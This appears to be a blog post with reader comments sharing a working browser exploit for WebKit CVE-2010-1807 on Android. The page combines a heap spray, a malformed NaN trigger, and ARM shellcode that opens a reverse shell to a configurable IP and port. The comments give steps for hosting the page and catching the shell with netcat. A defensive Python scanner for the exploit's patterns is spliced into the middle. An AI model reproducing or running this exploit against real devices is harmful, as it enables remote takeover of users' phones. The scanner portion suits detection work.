I've written a new exploit, based on MJ's, with a better success rate from my observation, and one that is easier to adjust to your IP/port.
This shellcode uses a one-instruction NOP sled instead of ~1700 instructions plus shellcode together, so understanding and adjusting the shellcode itself is easier.
<html>
<head>
<script>
//This code is only for security research/teaching purposes, use at your own risk!
// bug = webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//patched in Android 2.2; some said it works on some devices with 2.2.
//originally noticed/written by mj(good job man!)
//Found by Luke Wagner of Mozilla (Great work :))
//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com
var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))
//var ip = e.g: unescape("\u000a\u0202"); //ip = 10.0.2.2
function trigger()
{
var span = document.createElement("div");
document.getElementById("BodyID").appendChild(span);
span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //memory corruption when handling invalid values...
}
function exploit()
{
var nop = unescape("\u33bc\u0057"); //LDREQH R3,[R7],-0x3C for nopping
do
{
nop+=nop;
} while (nop.length<=0x1000);
var scode = nop+unescape("\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
scode += port;
scode += ip;
scode += unescape("\u2000\u2000");
target = new Array();
for(i = 0; i < 0x1000; i++)
target[i] = scode;
for (i = 0; i <= 0x1000; i++)
{
document.write(target[i]+"<i>");
if (i>0x999)
{
trigger();
}
}
}
</script>
</head>
<body id="BodyID">
Enjoy!
<script>
exploit();
</script>
</body>
</html>
The reason I've spent some time writing this version is that it is now more flexible to changes, the goal of each part of the exploit is easier to understand, and the success rate is 20%-30% higher from what I've observed; also, the shellcode is shorter and easier to analyze to see that it does no harm. Feel free to play with the amount of memory to allocate.
Only for research/study purposes and not for use on others.
Enjoy
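As an added example that is not part of the original post: a small Python scanner, written from the defender's side, that flags page source carrying the CVE-2010-1807 trigger (parseFloat of a malformed "NAN(...)" literal) together with the heap-spray indicators visible in the code above. The sample pages and the indicator names are constructed for illustration.

```python
import re

# Constructed sample pages: one benign, one carrying the trigger plus the
# spray pattern used above (a nop string doubled in a loop, written many times).
SAMPLE_PAGES = {
    "benign.html": """<script>
var x = parseFloat("3.14");
document.write("<p>" + x + "</p>");
</script>""",
    "suspect.html": """<script>
var nop = unescape("\\u33bc\\u0057");
do { nop += nop; } while (nop.length <= 0x1000);
span.innerHTML = -parseFloat("NAN(ffffe00572c60)");
for (i = 0; i <= 0x1000; i++) document.write(target[i] + "<i>");
</script>""",
}

# Indicators taken from the exploit above. The NAN(...) literal with a hex
# payload is the bug trigger on its own; the other three are generic spray
# building blocks and are only suspicious when they appear together.
INDICATORS = {
    "nan_payload": re.compile(r'parseFloat\(\s*"NAN\([0-9a-fA-F]+\)"\s*\)'),
    "unescape_u16": re.compile(r'unescape\(\s*"(?:\\u[0-9a-fA-F]{4}){2,}"\s*\)'),
    "string_doubling": re.compile(r'(\w+)\s*\+=\s*\1\b'),
    "write_loop": re.compile(r'for\s*\([^)]*\)\s*\{?\s*document\.write\('),
}

def scan_page(text):
    """Return the sorted indicator names found in one page's HTML/JS source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def classify(text):
    """'trigger' if the NAN literal is present, 'spray' if at least two spray
    parts are, else 'clean'. Returns (verdict, indicators)."""
    hits = scan_page(text)
    if "nan_payload" in hits:
        return "trigger", hits
    if len(hits) >= 2:
        return "spray", hits
    return "clean", hits

def scan_all(pages):
    """Classify every page in a {name: source} mapping."""
    return {name: classify(src) for name, src in pages.items()}

if __name__ == "__main__":
    for name, (verdict, hits) in scan_all(SAMPLE_PAGES).items():
        print(f"{name}: {verdict} {hits}")
```

Feed it real page sources and the 'spray' verdict will need tuning, since string doubling and write loops also occur in benign code; the 'trigger' verdict is specific to this bug.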
17 comments:
Gave it a shot and it worked for me. Nice work man.
Hello, thanks for the code. I'm a newbie in JavaScript, so if you can answer the next questions I would appreciate it. Questions: is it a reverse shell connect? In that case, what type of listener do I have to set? If you can make an example it would be great. Thanks, and sorry for my bad English.
Hi mauro:
Put this code under exploit.html on your server (whose address should be 192.168.0.1 if you don't want to make changes in the code before you run it), and go to your device and connect to the same Wi-Fi.
Now, on your server, open nc listening on port 12345.
Go to your device and browse to: http://192.168.0.1/exploit.html
A shell should be opened on your nc, without environment variables.
Type, for instance: /system/bin/ps
or /system/bin/id
I hope you understood...
good luck
Also, what do I need to learn to be able to edit this code? I have never been able to get a PoC to work and I want to start learning more. Do you have any resources for me to get started?
And when you say nc you mean netcat, right?
Yeah, NC is netcat...
What would I suggest to understand it better? I think it's individual, so contact me by email and I will be happy to refer you to some sources on different stuff that might help.
For the NC (this time NC = NookColor), nobody has tried your modified script yet. Maybe further explanations would be needed, sorry for that... The first one (as I see it, and I might be wrong) might be the exact JS code to run the series of your 'exploit1.html', 'exploit2.html', etc. Can transition commands be put within the exploit itself? Or am I asking for too much?
Thank you anyway.
Does the shellcode work on ARM platforms?
Reverse Connection to NC, by running swelkodeueseo do?
thank you
This shellcode was built for ARM platform, yeah.
I'm not sure what you meant by "swelkodeueseo"... If you can, please explain what you meant?
Zuk, thanks for the reply, I will try to see how it goes. Greetings
Is it possible to rewrite the shellcode so it will work for x86?
Thanks for your feed.
I can test it on the emulator, but on a real Android phone it doesn't work. How can I update the exploit code? And do you have available code for the Nexus One, Galaxy S, or anything? If you help me, I catch a fantastic chance from a customer. I really won't forget it. Please...
Should this work on earlier versions of Android as well? Also, is the address 'ffffe00572c60' uniquely powerful, or would any address in the last 8 bytes work?
Hi Zuk,
I am analyzing the CVE-2010-1807 PoC on your blog http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html.
I put the page on my server and try to debug the browser when surfing the page on the Android 2.1 emulator, but I don't know any debug tools for Android (like OllyDbg for Windows). Do you know any tools to debug the WebKit browser in Android?
I would very much appreciate your reply :)
Hello, I am currently trying to replicate this exploit in a testing environment. I have a VM running 2.1 and a CentOS server acting as the web server. I have netcat listening like so: nc -l 12345
And when the Android VM connects to the website, the web browser disappears and nothing happens on the server side. Help??